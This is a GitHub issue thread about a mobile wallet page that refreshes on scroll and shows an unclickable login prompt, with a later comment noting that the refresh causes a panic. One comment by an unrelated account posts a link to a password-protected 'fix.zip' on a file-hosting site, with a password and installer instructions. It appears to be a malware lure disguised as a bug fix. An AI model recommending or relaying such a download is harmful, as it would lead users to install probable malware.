### ISSUE TITLE
Scrolling wallet page down, is nudging user to login

### ISSUE THREAD

**Issue by harshitasrivastav28** [go-bazzinga/hot-or-not-backend-canister#380]
When user is on wallet page and scrolls the page down, the page is refreshed and starts showing "Login to clain COYN" CTA. This CTA is not clickable along with other touchpoints on the screen.

User gets stuck in the flow and has no option but to kill the app.
This is happening on android as well as iOS device.
The user remains logged in.

Please find the video attached for this issue.

https://github.com/user-attachments/assets/11fc5582-e2e6-4b0b-9ea2-9795718d9eda

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abeeshake-yral** [comment]
![Image](https://github.com/user-attachments/assets/fa508d3a-20f4-4e46-bee9-592c471a6a09)

page refresh causes panic.
